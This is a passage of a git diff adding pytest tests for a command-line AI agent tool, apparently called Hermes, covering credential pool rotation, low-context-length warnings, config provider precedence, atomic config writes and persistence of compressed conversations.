|
||||
|
||||
class _Pool:
|
||||
def entries(self):
|
||||
return [_Entry()]
|
||||
|
||||
def peek(self):
|
||||
return _Entry()
|
||||
|
||||
def select(self):
|
||||
raise AssertionError("auth_list_command should not call select()")
|
||||
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth_commands.load_pool",
|
||||
lambda provider: _Pool() if provider == "openrouter" else type("_EmptyPool", (), {"entries": lambda self: []})(),
|
||||
)
|
||||
|
||||
class _Args:
|
||||
provider = "openrouter"
|
||||
|
||||
auth_list_command(_Args())
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "openrouter (1 credentials):" in out
|
||||
assert "primary" in out
|
||||
|
||||
|
||||
def test_auth_list_shows_exhausted_cooldown(monkeypatch, capsys):
|
||||
from hermes_cli.auth_commands import auth_list_command
|
||||
|
||||
class _Entry:
|
||||
id = "cred-1"
|
||||
label = "primary"
|
||||
auth_type = "api_key"
|
||||
source = "manual"
|
||||
last_status = "exhausted"
|
||||
last_error_code = 429
|
||||
last_status_at = 1000.0
|
||||
|
||||
class _Pool:
|
||||
def entries(self):
|
||||
return [_Entry()]
|
||||
|
||||
def peek(self):
|
||||
return None
|
||||
|
||||
monkeypatch.setattr("hermes_cli.auth_commands.load_pool", lambda provider: _Pool())
|
||||
monkeypatch.setattr("hermes_cli.auth_commands.time.time", lambda: 1030.0)
|
||||
|
||||
class _Args:
|
||||
provider = "openrouter"
|
||||
|
||||
auth_list_command(_Args())
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "exhausted (429)" in out
|
||||
assert "59m 30s left" in out
|
||||
161
tests/test_cli_context_warning.py
Normal file
161
tests/test_cli_context_warning.py
Normal file
|
|
@ -0,0 +1,161 @@
|
|||
"""Tests for the low context length warning in the CLI banner."""
|
||||
|
||||
import os
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def _isolate(tmp_path, monkeypatch):
|
||||
"""Isolate HERMES_HOME so tests don't touch real config."""
|
||||
home = tmp_path / ".hermes"
|
||||
home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(home))
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def cli_obj(_isolate):
|
||||
"""Create a minimal HermesCLI instance for banner testing."""
|
||||
with patch("cli.load_cli_config", return_value={
|
||||
"display": {"tool_progress": "new"},
|
||||
"terminal": {},
|
||||
}), patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
from cli import HermesCLI
|
||||
obj = HermesCLI.__new__(HermesCLI)
|
||||
obj.model = "test-model"
|
||||
obj.enabled_toolsets = ["hermes-core"]
|
||||
obj.compact = False
|
||||
obj.console = MagicMock()
|
||||
obj.session_id = None
|
||||
obj.api_key = "test"
|
||||
obj.base_url = ""
|
||||
obj.provider = "test"
|
||||
obj._provider_source = None
|
||||
# Mock agent with context compressor
|
||||
obj.agent = SimpleNamespace(
|
||||
context_compressor=SimpleNamespace(context_length=None)
|
||||
)
|
||||
return obj
|
||||
|
||||
|
||||
class TestLowContextWarning:
|
||||
"""Tests that the CLI warns about low context lengths."""
|
||||
|
||||
def test_no_warning_for_normal_context(self, cli_obj):
|
||||
"""No warning when context is 32k+."""
|
||||
cli_obj.agent.context_compressor.context_length = 32768
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
# Check that no yellow warning was printed
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 0
|
||||
|
||||
def test_warning_for_low_context(self, cli_obj):
|
||||
"""Warning shown when context is 4096 (Ollama default)."""
|
||||
cli_obj.agent.context_compressor.context_length = 4096
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 1
|
||||
assert "4,096" in warning_calls[0]
|
||||
|
||||
def test_warning_for_2048_context(self, cli_obj):
|
||||
"""Warning shown for 2048 tokens (common LM Studio default)."""
|
||||
cli_obj.agent.context_compressor.context_length = 2048
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 1
|
||||
|
||||
def test_no_warning_at_boundary(self, cli_obj):
|
||||
"""No warning at exactly 8192 — 8192 is borderline but included in warning."""
|
||||
cli_obj.agent.context_compressor.context_length = 8192
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 1 # 8192 is still warned about
|
||||
|
||||
def test_no_warning_above_boundary(self, cli_obj):
|
||||
"""No warning at 16384."""
|
||||
cli_obj.agent.context_compressor.context_length = 16384
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 0
|
||||
|
||||
def test_ollama_specific_hint(self, cli_obj):
|
||||
"""Ollama-specific fix shown when port 11434 detected."""
|
||||
cli_obj.agent.context_compressor.context_length = 4096
|
||||
cli_obj.base_url = "http://localhost:11434/v1"
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
ollama_hints = [c for c in calls if "OLLAMA_CONTEXT_LENGTH" in c]
|
||||
assert len(ollama_hints) == 1
|
||||
|
||||
def test_lm_studio_specific_hint(self, cli_obj):
|
||||
"""LM Studio-specific fix shown when port 1234 detected."""
|
||||
cli_obj.agent.context_compressor.context_length = 2048
|
||||
cli_obj.base_url = "http://localhost:1234/v1"
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
lms_hints = [c for c in calls if "LM Studio" in c]
|
||||
assert len(lms_hints) == 1
|
||||
|
||||
def test_generic_hint_for_other_servers(self, cli_obj):
|
||||
"""Generic fix shown for unknown servers."""
|
||||
cli_obj.agent.context_compressor.context_length = 4096
|
||||
cli_obj.base_url = "http://localhost:8080/v1"
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
generic_hints = [c for c in calls if "config.yaml" in c]
|
||||
assert len(generic_hints) == 1
|
||||
|
||||
def test_no_warning_when_no_context_length(self, cli_obj):
|
||||
"""No warning when context length is not yet known."""
|
||||
cli_obj.agent.context_compressor.context_length = None
|
||||
with patch("cli.get_tool_definitions", return_value=[]), \
|
||||
patch("cli.build_welcome_banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 0
|
||||
|
||||
def test_compact_banner_does_not_crash_on_narrow_terminal(self, cli_obj):
|
||||
"""Compact mode should still have ctx_len defined for warning logic."""
|
||||
cli_obj.agent.context_compressor.context_length = 4096
|
||||
|
||||
with patch("shutil.get_terminal_size", return_value=os.terminal_size((70, 40))), \
|
||||
patch("cli._build_compact_banner", return_value="compact banner"):
|
||||
cli_obj.show_banner()
|
||||
|
||||
calls = [str(c) for c in cli_obj.console.print.call_args_list]
|
||||
warning_calls = [c for c in calls if "too low" in c]
|
||||
assert len(warning_calls) == 1
|
||||
|
|
@ -192,6 +192,91 @@ class TestHistoryDisplay:
|
|||
assert "A" * 250 + "..." not in output
|
||||
|
||||
|
||||
class TestRootLevelProviderOverride:
|
||||
"""Root-level provider/base_url in config.yaml must NOT override model.provider."""
|
||||
|
||||
def test_model_provider_wins_over_root_provider(self, tmp_path, monkeypatch):
|
||||
"""model.provider takes priority — root-level provider is only a fallback."""
|
||||
import yaml
|
||||
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
config_path = hermes_home / "config.yaml"
|
||||
config_path.write_text(yaml.safe_dump({
|
||||
"provider": "opencode-go", # stale root-level key
|
||||
"model": {
|
||||
"default": "google/gemini-3-flash-preview",
|
||||
"provider": "openrouter", # correct canonical key
|
||||
},
|
||||
}))
|
||||
|
||||
import cli
|
||||
monkeypatch.setattr(cli, "_hermes_home", hermes_home)
|
||||
cfg = cli.load_cli_config()
|
||||
|
||||
assert cfg["model"]["provider"] == "openrouter"
|
||||
|
||||
def test_root_provider_ignored_when_default_model_provider_exists(self, tmp_path, monkeypatch):
|
||||
"""Even when model.provider is the default 'auto', root-level provider is ignored."""
|
||||
import yaml
|
||||
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
config_path = hermes_home / "config.yaml"
|
||||
config_path.write_text(yaml.safe_dump({
|
||||
"provider": "opencode-go", # stale root key
|
||||
"model": {
|
||||
"default": "google/gemini-3-flash-preview",
|
||||
# no explicit model.provider — defaults provide "auto"
|
||||
},
|
||||
}))
|
||||
|
||||
import cli
|
||||
monkeypatch.setattr(cli, "_hermes_home", hermes_home)
|
||||
cfg = cli.load_cli_config()
|
||||
|
||||
# Root-level "opencode-go" must NOT leak through
|
||||
assert cfg["model"]["provider"] != "opencode-go"
|
||||
|
||||
def test_normalize_root_model_keys_moves_to_model(self):
|
||||
"""_normalize_root_model_keys migrates root keys into model section."""
|
||||
from hermes_cli.config import _normalize_root_model_keys
|
||||
|
||||
config = {
|
||||
"provider": "opencode-go",
|
||||
"base_url": "https://example.com/v1",
|
||||
"model": {
|
||||
"default": "some-model",
|
||||
},
|
||||
}
|
||||
result = _normalize_root_model_keys(config)
|
||||
# Root keys removed
|
||||
assert "provider" not in result
|
||||
assert "base_url" not in result
|
||||
# Migrated into model section
|
||||
assert result["model"]["provider"] == "opencode-go"
|
||||
assert result["model"]["base_url"] == "https://example.com/v1"
|
||||
|
||||
def test_normalize_root_model_keys_does_not_override_existing(self):
|
||||
"""Existing model.provider is never overridden by root-level key."""
|
||||
from hermes_cli.config import _normalize_root_model_keys
|
||||
|
||||
config = {
|
||||
"provider": "stale-provider",
|
||||
"model": {
|
||||
"default": "some-model",
|
||||
"provider": "correct-provider",
|
||||
},
|
||||
}
|
||||
result = _normalize_root_model_keys(config)
|
||||
assert result["model"]["provider"] == "correct-provider"
|
||||
assert "provider" not in result # root key still cleaned up
|
||||
|
||||
|
||||
class TestProviderResolution:
|
||||
def test_api_key_is_string_or_none(self):
|
||||
cli = _make_cli()
|
||||
|
|
|
|||
|
|
@ -508,6 +508,7 @@ def test_cmd_model_falls_back_to_auto_on_invalid_provider(monkeypatch, capsys):
|
|||
|
||||
monkeypatch.setattr("hermes_cli.auth.resolve_provider", _resolve_provider)
|
||||
monkeypatch.setattr(hermes_main, "_prompt_provider_choice", lambda choices: len(choices) - 1)
|
||||
monkeypatch.setattr("sys.stdin", type("FakeTTY", (), {"isatty": lambda self: True})())
|
||||
|
||||
hermes_main.cmd_model(SimpleNamespace())
|
||||
output = capsys.readouterr().out
|
||||
|
|
@ -543,15 +544,18 @@ def test_model_flow_custom_saves_verified_v1_base_url(monkeypatch, capsys):
|
|||
)
|
||||
monkeypatch.setattr("hermes_cli.config.save_config", lambda cfg: None)
|
||||
|
||||
answers = iter(["http://localhost:8000", "local-key", "llm", ""])
|
||||
# After the probe detects a single model ("llm"), the flow asks
|
||||
# "Use this model? [Y/n]:" — confirm with Enter, then context length.
|
||||
answers = iter(["http://localhost:8000", "local-key", "", ""])
|
||||
monkeypatch.setattr("builtins.input", lambda _prompt="": next(answers))
|
||||
|
||||
hermes_main._model_flow_custom({})
|
||||
output = capsys.readouterr().out
|
||||
|
||||
assert "Saving the working base URL instead" in output
|
||||
assert saved_env["OPENAI_BASE_URL"] == "http://localhost:8000/v1"
|
||||
assert saved_env["OPENAI_API_KEY"] == "local-key"
|
||||
assert "Detected model: llm" in output
|
||||
# OPENAI_BASE_URL is no longer saved to .env — config.yaml is authoritative
|
||||
assert "OPENAI_BASE_URL" not in saved_env
|
||||
assert saved_env["MODEL"] == "llm"
|
||||
|
||||
|
||||
|
|
|
|||
80
tests/test_cli_save_config_value.py
Normal file
80
tests/test_cli_save_config_value.py
Normal file
|
|
@ -0,0 +1,80 @@
|
|||
"""Tests for save_config_value() in cli.py — atomic write behavior."""
|
||||
|
||||
import os
|
||||
import yaml
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch, MagicMock
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
class TestSaveConfigValueAtomic:
|
||||
"""save_config_value() must use atomic_yaml_write to avoid data loss."""
|
||||
|
||||
@pytest.fixture
|
||||
def config_env(self, tmp_path, monkeypatch):
|
||||
"""Isolated config environment with a writable config.yaml."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_path = hermes_home / "config.yaml"
|
||||
config_path.write_text(yaml.dump({
|
||||
"model": {"default": "test-model", "provider": "openrouter"},
|
||||
"display": {"skin": "default"},
|
||||
}))
|
||||
monkeypatch.setattr("cli._hermes_home", hermes_home)
|
||||
return config_path
|
||||
|
||||
def test_calls_atomic_yaml_write(self, config_env, monkeypatch):
|
||||
"""save_config_value must route through atomic_yaml_write, not bare open()."""
|
||||
mock_atomic = MagicMock()
|
||||
monkeypatch.setattr("utils.atomic_yaml_write", mock_atomic)
|
||||
|
||||
from cli import save_config_value
|
||||
save_config_value("display.skin", "mono")
|
||||
|
||||
mock_atomic.assert_called_once()
|
||||
written_path, written_data = mock_atomic.call_args[0]
|
||||
assert Path(written_path) == config_env
|
||||
assert written_data["display"]["skin"] == "mono"
|
||||
|
||||
def test_preserves_existing_keys(self, config_env):
|
||||
"""Writing a new key must not clobber existing config entries."""
|
||||
from cli import save_config_value
|
||||
save_config_value("agent.max_turns", 50)
|
||||
|
||||
result = yaml.safe_load(config_env.read_text())
|
||||
assert result["model"]["default"] == "test-model"
|
||||
assert result["model"]["provider"] == "openrouter"
|
||||
assert result["display"]["skin"] == "default"
|
||||
assert result["agent"]["max_turns"] == 50
|
||||
|
||||
def test_creates_nested_keys(self, config_env):
|
||||
"""Dot-separated paths create intermediate dicts as needed."""
|
||||
from cli import save_config_value
|
||||
save_config_value("compression.summary_model", "google/gemini-3-flash-preview")
|
||||
|
||||
result = yaml.safe_load(config_env.read_text())
|
||||
assert result["compression"]["summary_model"] == "google/gemini-3-flash-preview"
|
||||
|
||||
def test_overwrites_existing_value(self, config_env):
|
||||
"""Updating an existing key replaces the value."""
|
||||
from cli import save_config_value
|
||||
save_config_value("display.skin", "ares")
|
||||
|
||||
result = yaml.safe_load(config_env.read_text())
|
||||
assert result["display"]["skin"] == "ares"
|
||||
|
||||
def test_file_not_truncated_on_error(self, config_env, monkeypatch):
|
||||
"""If atomic_yaml_write raises, the original file is untouched."""
|
||||
original_content = config_env.read_text()
|
||||
|
||||
def exploding_write(*args, **kwargs):
|
||||
raise OSError("disk full")
|
||||
|
||||
monkeypatch.setattr("utils.atomic_yaml_write", exploding_write)
|
||||
|
||||
from cli import save_config_value
|
||||
result = save_config_value("display.skin", "broken")
|
||||
|
||||
assert result is False
|
||||
assert config_env.read_text() == original_content
|
||||
|
|
@ -112,7 +112,7 @@ def test_cron_run_job_codex_path_handles_internal_401_refresh(monkeypatch):
|
|||
_Codex401ThenSuccessAgent.last_init = {}
|
||||
|
||||
success, output, final_response, error = cron_scheduler.run_job(
|
||||
{"id": "job-1", "name": "Codex Refresh Test", "prompt": "ping"}
|
||||
{"id": "job-1", "name": "Codex Refresh Test", "prompt": "ping", "model": "gpt-5.3-codex"}
|
||||
)
|
||||
|
||||
assert success is True
|
||||
|
|
@ -139,6 +139,7 @@ def test_gateway_run_agent_codex_path_handles_internal_401_refresh(monkeypatch):
|
|||
},
|
||||
)
|
||||
monkeypatch.setenv("HERMES_TOOL_PROGRESS", "false")
|
||||
monkeypatch.setenv("HERMES_MODEL", "gpt-5.3-codex")
|
||||
|
||||
_Codex401ThenSuccessAgent.refresh_attempts = 0
|
||||
_Codex401ThenSuccessAgent.last_init = {}
|
||||
|
|
|
|||
|
|
@ -187,12 +187,12 @@ class TestNormalizeModelForProvider:
|
|||
assert cli.model == "claude-opus-4.6"
|
||||
|
||||
def test_default_model_replaced(self):
|
||||
"""The untouched default (anthropic/claude-opus-4.6) gets swapped."""
|
||||
"""No model configured (empty default) gets swapped for codex."""
|
||||
import cli as _cli_mod
|
||||
_clean_config = {
|
||||
"model": {
|
||||
"default": "anthropic/claude-opus-4.6",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"default": "",
|
||||
"base_url": "",
|
||||
"provider": "auto",
|
||||
},
|
||||
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},
|
||||
|
|
@ -219,12 +219,12 @@ class TestNormalizeModelForProvider:
|
|||
assert cli.model == "gpt-5.3-codex"
|
||||
|
||||
def test_default_fallback_when_api_fails(self):
|
||||
"""Default model falls back to gpt-5.3-codex when API unreachable."""
|
||||
"""No model configured falls back to gpt-5.3-codex when API unreachable."""
|
||||
import cli as _cli_mod
|
||||
_clean_config = {
|
||||
"model": {
|
||||
"default": "anthropic/claude-opus-4.6",
|
||||
"base_url": "https://openrouter.ai/api/v1",
|
||||
"default": "",
|
||||
"base_url": "",
|
||||
"provider": "auto",
|
||||
},
|
||||
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},
|
||||
|
|
|
|||
202
tests/test_compression_persistence.py
Normal file
202
tests/test_compression_persistence.py
Normal file
|
|
@ -0,0 +1,202 @@
|
|||
"""Tests for context compression persistence in the gateway.
|
||||
|
||||
Verifies that when context compression fires during run_conversation(),
|
||||
the compressed messages are properly persisted to both SQLite (via the
|
||||
agent) and JSONL (via the gateway).
|
||||
|
||||
Bug scenario (pre-fix):
|
||||
1. Gateway loads 200-message history, passes to agent
|
||||
2. Agent's run_conversation() compresses to ~30 messages mid-run
|
||||
3. _compress_context() resets _last_flushed_db_idx = 0
|
||||
4. On exit, _flush_messages_to_session_db() calculates:
|
||||
flush_from = max(len(conversation_history=200), _last_flushed_db_idx=0) = 200
|
||||
5. messages[200:] is empty (only ~30 messages after compression)
|
||||
6. Nothing written to new session's SQLite — compressed context lost
|
||||
7. Gateway's history_offset was still 200, producing empty new_messages
|
||||
8. Fallback wrote only user/assistant pair — summary lost
|
||||
"""
|
||||
|
||||
import os
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Part 1: Agent-side — _flush_messages_to_session_db after compression
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestFlushAfterCompression:
|
||||
"""Verify that compressed messages are flushed to the new session's SQLite
|
||||
even when conversation_history (from the original session) is longer than
|
||||
the compressed messages list."""
|
||||
|
||||
def _make_agent(self, session_db):
|
||||
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent(
|
||||
model="test/model",
|
||||
quiet_mode=True,
|
||||
session_db=session_db,
|
||||
session_id="original-session",
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
return agent
|
||||
|
||||
def test_flush_after_compression_with_long_history(self):
|
||||
"""The actual bug: conversation_history longer than compressed messages.
|
||||
|
||||
Before the fix, flush_from = max(len(conversation_history), 0) = 200,
|
||||
but messages only has ~30 entries, so messages[200:] is empty.
|
||||
After the fix, conversation_history is cleared to None after compression,
|
||||
so flush_from = max(0, 0) = 0, and ALL compressed messages are written.
|
||||
"""
|
||||
from hermes_state import SessionDB
|
||||
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
db_path = Path(tmpdir) / "test.db"
|
||||
db = SessionDB(db_path=db_path)
|
||||
|
||||
agent = self._make_agent(db)
|
||||
|
||||
# Simulate the original long history (200 messages)
|
||||
original_history = [
|
||||
{"role": "user" if i % 2 == 0 else "assistant",
|
||||
"content": f"message {i}"}
|
||||
for i in range(200)
|
||||
]
|
||||
|
||||
# First, flush original messages to the original session
|
||||
agent._flush_messages_to_session_db(original_history, [])
|
||||
original_rows = db.get_messages("original-session")
|
||||
assert len(original_rows) == 200
|
||||
|
||||
# Now simulate compression: new session, reset idx, shorter messages
|
||||
agent.session_id = "compressed-session"
|
||||
db.create_session(session_id="compressed-session", source="test")
|
||||
agent._last_flushed_db_idx = 0
|
||||
|
||||
# The compressed messages (summary + tail + new turn)
|
||||
compressed_messages = [
|
||||
{"role": "user", "content": "[CONTEXT COMPACTION] Summary of work..."},
|
||||
{"role": "user", "content": "What should we do next?"},
|
||||
{"role": "assistant", "content": "Let me check..."},
|
||||
{"role": "user", "content": "new question"},
|
||||
{"role": "assistant", "content": "new answer"},
|
||||
]
|
||||
|
||||
# THE BUG: passing the original history as conversation_history
|
||||
# causes flush_from = max(200, 0) = 200, skipping everything.
|
||||
# After the fix, conversation_history should be None.
|
||||
agent._flush_messages_to_session_db(compressed_messages, None)
|
||||
|
||||
new_rows = db.get_messages("compressed-session")
|
||||
assert len(new_rows) == 5, (
|
||||
f"Expected 5 compressed messages in new session, got {len(new_rows)}. "
|
||||
f"Compression persistence bug: messages not written to SQLite."
|
||||
)
|
||||
|
||||
def test_flush_with_stale_history_loses_messages(self):
|
||||
"""Demonstrates the bug condition: stale conversation_history causes data loss."""
|
||||
from hermes_state import SessionDB
|
||||
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
db_path = Path(tmpdir) / "test.db"
|
||||
db = SessionDB(db_path=db_path)
|
||||
|
||||
agent = self._make_agent(db)
|
||||
|
||||
# Simulate compression reset
|
||||
agent.session_id = "new-session"
|
||||
db.create_session(session_id="new-session", source="test")
|
||||
agent._last_flushed_db_idx = 0
|
||||
|
||||
compressed = [
|
||||
{"role": "user", "content": "summary"},
|
||||
{"role": "assistant", "content": "continuing..."},
|
||||
]
|
||||
|
||||
# Bug: passing a conversation_history longer than compressed messages
|
||||
stale_history = [{"role": "user", "content": f"msg{i}"} for i in range(100)]
|
||||
agent._flush_messages_to_session_db(compressed, stale_history)
|
||||
|
||||
rows = db.get_messages("new-session")
|
||||
# With the stale history, flush_from = max(100, 0) = 100
|
||||
# But compressed only has 2 entries → messages[100:] = empty
|
||||
assert len(rows) == 0, (
|
||||
"Expected 0 messages with stale conversation_history "
|
||||
"(this test verifies the bug condition exists)"
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Part 2: Gateway-side — history_offset after session split
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestGatewayHistoryOffsetAfterSplit:
|
||||
"""Verify that when the agent creates a new session during compression,
|
||||
the gateway uses history_offset=0 so all compressed messages are written
|
||||
to the JSONL transcript."""
|
||||
|
||||
def test_history_offset_zero_on_session_split(self):
|
||||
"""When agent.session_id differs from the original, history_offset must be 0."""
|
||||
# This tests the logic in gateway/run.py run_sync():
|
||||
# _session_was_split = agent.session_id != session_id
|
||||
# _effective_history_offset = 0 if _session_was_split else len(agent_history)
|
||||
|
||||
original_session_id = "session-abc"
|
||||
agent_session_id = "session-compressed-xyz" # Different = compression happened
|
||||
agent_history_len = 200
|
||||
|
||||
# Simulate the gateway's offset calculation (post-fix)
|
||||
_session_was_split = (agent_session_id != original_session_id)
|
||||
_effective_history_offset = 0 if _session_was_split else agent_history_len
|
||||
|
||||
assert _session_was_split is True
|
||||
assert _effective_history_offset == 0
|
||||
|
||||
def test_history_offset_preserved_without_split(self):
|
||||
"""When no compression happened, history_offset is the original length."""
|
||||
session_id = "session-abc"
|
||||
agent_session_id = "session-abc" # Same = no compression
|
||||
agent_history_len = 200
|
||||
|
||||
_session_was_split = (agent_session_id != session_id)
|
||||
_effective_history_offset = 0 if _session_was_split else agent_history_len
|
||||
|
||||
assert _session_was_split is False
|
||||
assert _effective_history_offset == 200
|
||||
|
||||
def test_new_messages_extraction_after_split(self):
|
||||
"""After compression with offset=0, new_messages should be ALL agent messages."""
|
||||
# Simulates the gateway's new_messages calculation
|
||||
agent_messages = [
|
||||
{"role": "user", "content": "[CONTEXT COMPACTION] Summary..."},
|
||||
{"role": "user", "content": "recent question"},
|
||||
{"role": "assistant", "content": "recent answer"},
|
||||
{"role": "user", "content": "new question"},
|
||||
{"role": "assistant", "content": "new answer"},
|
||||
]
|
||||
history_offset = 0 # After fix: 0 on session split
|
||||
|
||||
new_messages = agent_messages[history_offset:] if len(agent_messages) > history_offset else []
|
||||
assert len(new_messages) == 5, (
|
||||
f"Expected all 5 messages with offset=0, got {len(new_messages)}"
|
||||
)
|
||||
|
||||
def test_new_messages_empty_with_stale_offset(self):
|
||||
"""Demonstrates the bug: stale offset produces empty new_messages."""
|
||||
agent_messages = [
|
||||
{"role": "user", "content": "summary"},
|
||||
{"role": "assistant", "content": "answer"},
|
||||
]
|
||||
# Bug: offset is the pre-compression history length
|
||||
history_offset = 200
|
||||
|
||||
new_messages = agent_messages[history_offset:] if len(agent_messages) > history_offset else []
|
||||
assert len(new_messages) == 0, (
|
||||
"Expected 0 messages with stale offset=200 (demonstrates the bug)"
|
||||
)
|
||||
949
tests/test_credential_pool.py
Normal file
949
tests/test_credential_pool.py
Normal file
|
|
@ -0,0 +1,949 @@
|
|||
"""Tests for multi-credential runtime pooling and rotation."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import time
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def _write_auth_store(tmp_path, payload: dict) -> None:
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir(parents=True, exist_ok=True)
|
||||
(hermes_home / "auth.json").write_text(json.dumps(payload, indent=2))
|
||||
|
||||
|
||||
def test_fill_first_selection_skips_recently_exhausted_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
"last_status": "exhausted",
|
||||
"last_status_at": time.time(),
|
||||
"last_error_code": 402,
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
"last_status": "ok",
|
||||
"last_status_at": None,
|
||||
"last_error_code": None,
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.id == "cred-2"
|
||||
assert pool.current().id == "cred-2"
|
||||
|
||||
|
||||
def test_select_clears_expired_exhaustion(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "old",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
"last_status": "exhausted",
|
||||
"last_status_at": time.time() - 90000,
|
||||
"last_error_code": 402,
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
|
||||
pool = load_pool("anthropic")
|
||||
entry = pool.select()
|
||||
|
||||
assert entry is not None
|
||||
assert entry.last_status == "ok"
|
||||
|
||||
|
||||
def test_round_robin_strategy_rotates_priorities(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "***",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
config_path = tmp_path / "hermes" / "config.yaml"
|
||||
